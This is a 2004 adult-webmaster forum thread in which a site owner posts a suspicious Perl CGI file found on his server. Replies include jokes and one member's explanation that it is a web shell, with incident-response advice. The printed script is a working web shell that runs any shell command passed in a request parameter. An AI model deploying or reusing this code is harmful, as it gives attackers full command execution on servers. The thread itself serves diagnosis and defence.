|
|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
 |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
04-02-2004, 07:55 PM
|
#1 |
|
Confirmed User
Industry Role:
Join Date: Aug 2001
Posts: 1,255
|
What would this cgi code do?
Just found this cgi file on my server... looks a bit suspicious to me...
Code:
#!/usr/bin/perl
use CGI qw(:standard); print header; my $k=param("g"); my $a=param("a"); if ($a || $k) {$l=`$k 2>&1`; print start_form,textarea("g",$k,3,50); print submit("fuck base-x"); print end_form; print pre($l);} print $ENV{"NS2.ISPRIME.COM"};
Thanks! |
|
|
|
04-02-2004, 07:58 PM
|
#2 |
|
Confirmed User
Industry Role:
Join Date: Sep 2002
Location: In your mind
Posts: 3,766
|
it loads hot chicks from isprime.. really!! try it!!
 |
|
|
|
|
04-02-2004, 08:14 PM
|
#3 |
|
The Profiler
Industry Role:
Join Date: Oct 2002
Location: ICQ 76281726 and I'm female
Posts: 14,618
|
 |
|
|
|
|
04-02-2004, 08:29 PM
|
#4 |
|
Confirmed User
Join Date: Nov 2003
Posts: 4,292
|
not in that size font i cant, i hate those code tags
|
|
|
|
|
04-02-2004, 08:35 PM
|
#5 |
|
HAL 9000
Industry Role:
Join Date: May 2001
Posts: 34,515
|
dude this is very serious
but i dont have an idea what is it  |
|
|
|
|
04-02-2004, 09:43 PM
|
#6 |
|
Confirmed User
Join Date: Oct 2002
Posts: 3,745
|
That script lets someone run commands on your
server - any commands they want. Take careful note of the timestamps on that file. Download it. Delete it. Notify your host/admin right away, letting them know the file timestamps so that they can look in the logs to see what happened around the time that file got created. Pray that your host/admin had CGI running as unprivileged user and not as your username. If you don't have a good admin, get one now. A very good one. Someone had to hack your site (or be given FTP access) in order to put that script there. You'll need to figure out how they did it. Apache and FTP logs will show FTP logins and which existing scripts were hit around the time that script was created. You'll need to secure that so they don't do it again. Probably, they also used that script to create more security holes you'll need to find and patch.
__________________
For historical display only. This information is not current: support@bettercgi.com ICQ 7208627 Strongbox - The next generation in site security Throttlebox - The next generation in bandwidth control Clonebox - Backup and disaster recovery on steroids |
|
|
|
|
04-03-2004, 05:25 AM
|
#7 |
|
Confirmed User
Industry Role:
Join Date: Aug 2001
Posts: 1,255
|
I thought it was suspect
My server had been fucking up a lot lately and my host traced it to this file. It's gone now of course! I'll ask them to have a look at the time stamps. Thanks raymor |
|
|
|
